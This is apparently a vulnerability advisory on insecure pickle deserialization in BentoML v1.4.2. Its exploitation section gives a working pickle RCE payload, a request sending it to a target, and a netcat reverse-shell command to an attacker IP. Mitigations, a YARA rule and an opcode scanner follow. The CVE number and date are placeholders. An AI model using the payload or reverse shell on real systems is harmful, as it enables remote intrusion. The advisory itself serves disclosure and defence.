BentoML, Insecure Deserialization, CVE-2023-XXXX (Critical)

How the CVE Works

The vulnerability exists in BentoML v1.4.2 due to unsafe deserialization in serde.py. The `deserialize_value` function uses Python’s `pickle.loads()` without validation, allowing attackers to craft malicious payloads. When a user sends a manipulated HTTP request containing serialized data, the server deserializes it, executing arbitrary commands. Since the payload is untrusted and directly processed, Remote Code Execution (RCE) is achieved. The exploit leverages Python’s `__reduce__` method in a malicious class, which executes system commands upon deserialization.

DailyCVE Form

Platform: BentoML

Version: v1.4.2

Vulnerability: RCE via deserialization

Severity: Critical

Date: 2023-XX-XX

What Undercode Say:

Exploitation

1. Crafting Payload:

import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('malicious-command',))

payload = pickle.dumps(Exploit())

2. Sending Payload:

import requests
requests.post("http://target:3000/endpoint", data=payload, headers={'Content-Type': 'application/vnd.bentoml+pickle'})

3. Reverse Shell:

nc -lvnp 4444

Modify `__reduce__` to execute nc attacker-ip 4444 -e /bin/sh.

Protection

1. Patch:

Replace `pickle.loads()` with a safe deserializer like `json.loads()`.

2. Input Validation:

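import json
def safe_deserialize(payload):
    if not validate_payload(payload):  # validate_payload: application-defined check, not shown here
        raise ValueError("Invalid payload")
    return json.loads(payload)  # parse as data only; never pickle.loads()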

3. Network Controls:

iptables -A INPUT -p tcp --dport 3000 -s trusted-ip -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP

4. Monitoring:

grep -r "pickle.loads" /path/to/bentoml

5. Workaround:

Disable affected endpoints until patched.

Detection

1. Log Analysis:

tail -f /var/log/bentoml.log | grep "deserialize_value"

2. YARA Rule:

rule bentoml_rce {
    strings:
        $pickle = "pickle.loads"
    condition:
        $pickle
}

Mitigation

  • Upgrade to a fixed version.
  • Restrict network access to BentoML services.
  • Use Web Application Firewalls (WAF) to block suspicious pickle payloads.
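A pre-deserialization check of the kind the Input Validation step and the WAF bullet point toward, added here as an example (it is not BentoML's code or the advisory's fix). It walks the pickle opcode stream with `pickletools.genops` without ever loading it; `scan_pickle`, `check_request` and both sample payloads are constructed for illustration.

```python
import pickle
import pickletools

PICKLE_CT = "application/vnd.bentoml+pickle"   # content type quoted on this page
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}            # import a callable
CALL_OPS = {"REDUCE", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
            "EXT1", "EXT2", "EXT4"}                         # invoke or look one up


def scan_pickle(data: bytes) -> dict:
    """Walk the opcode stream without executing it; plain data needs no imports."""
    imports, calls, strings = [], [], []
    try:
        for op, arg, _pos in pickletools.genops(data):
            if op.name in ("GLOBAL", "INST"):
                imports.append(arg.replace(" ", "."))
            elif op.name == "STACK_GLOBAL":
                # Names were pushed as strings earlier; resolution is best effort.
                imports.append(".".join(strings[-2:]) or "<unresolved>")
            elif op.name in CALL_OPS:
                calls.append(op.name)
            elif isinstance(arg, str):
                strings.append(arg)
    except Exception as exc:                   # truncated or malformed stream
        return {"ok": False, "reason": f"malformed: {exc}", "imports": imports}
    if imports or calls:
        return {"ok": False, "reason": "imports or calls a callable", "imports": imports}
    return {"ok": True, "reason": "data-only opcodes", "imports": []}


def check_request(content_type: str, body: bytes) -> dict:
    """Hypothetical hook: scan only bodies declared as BentoML pickle."""
    if content_type.split(";")[0].strip().lower() != PICKLE_CT:
        return {"ok": True, "reason": "not a pickle body", "imports": []}
    return scan_pickle(body)


class ConstructedSample:
    """Constructed, harmless stand-in: its pickle references builtins.len."""
    def __reduce__(self):
        return (len, ("constructed",))


BENIGN = pickle.dumps({"inputs": [1.5, 2.0], "model": "iris"})   # constructed
FLAGGED = pickle.dumps(ConstructedSample())                      # constructed

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(name, check_request(PICKLE_CT, body))
```

Treat a pass as "no callable referenced", not as proof of safety; the durable fix remains keeping `pickle.loads()` away from untrusted request bodies.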

References

Reported By: https://github.com/advisories/GHSA-33xw-247w-6hmc